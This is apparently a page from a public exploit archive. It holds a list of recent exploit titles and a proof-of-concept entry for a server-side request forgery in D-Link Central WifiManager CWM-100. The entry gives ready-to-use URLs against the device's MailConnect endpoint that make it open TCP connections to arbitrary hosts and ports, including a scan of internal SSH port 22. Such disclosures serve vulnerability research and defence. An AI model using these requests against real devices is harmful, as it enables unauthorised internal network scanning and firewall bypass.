
15 changes to exploits/shellcodes HeidiSQL 9.5.0.5196 - Denial of Service (PoC) CuteFTP 9.3.0.3 - Denial of Service (PoC) Mongoose Web Server 6.9 - Denial of Service (PoC) Data Center Audit 2.6.2 - 'username' SQL Injection TufinOS 2.17 Build 1193 - XML External Entity Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal Paroiciel 11.20 - 'tRecIdListe' SQL Injection TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure) The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin) GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery Nominas 0.27 - 'username' SQL Injection
28 lines
No EOL
1.2 KiB
Text
28 lines
No EOL
1.2 KiB
Text
# Exploit Title: D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
|
|
# Author: John Page (aka hyp3rlinx)
|
|
# Date: 2018-11-09
|
|
# Vendor: http://us.dlink.com
|
|
# Product Link: http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
|
|
# Version: Version 1.03 r0098
|
|
# CVE: N/A
|
|
# References:
|
|
|
|
# [Security Issue]
|
|
# Using a web browser or script SSRF can be initiated against internal/external systems
|
|
# to conduct port scans by leveraging D-LINKs MailConnect component.
|
|
|
|
# The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended
|
|
# to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address,
|
|
# leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
|
|
# This can undermine accountability of where scan or connections actually came from and or bypass
|
|
# the FW etc. This can be automated via script or using Web Browser.
|
|
|
|
# [Exploit/POC]
|
|
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/
|
|
|
|
reply: OK
|
|
|
|
#Scan internal port 22 SSH:
|
|
|
|
https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
|
|
reply: OK |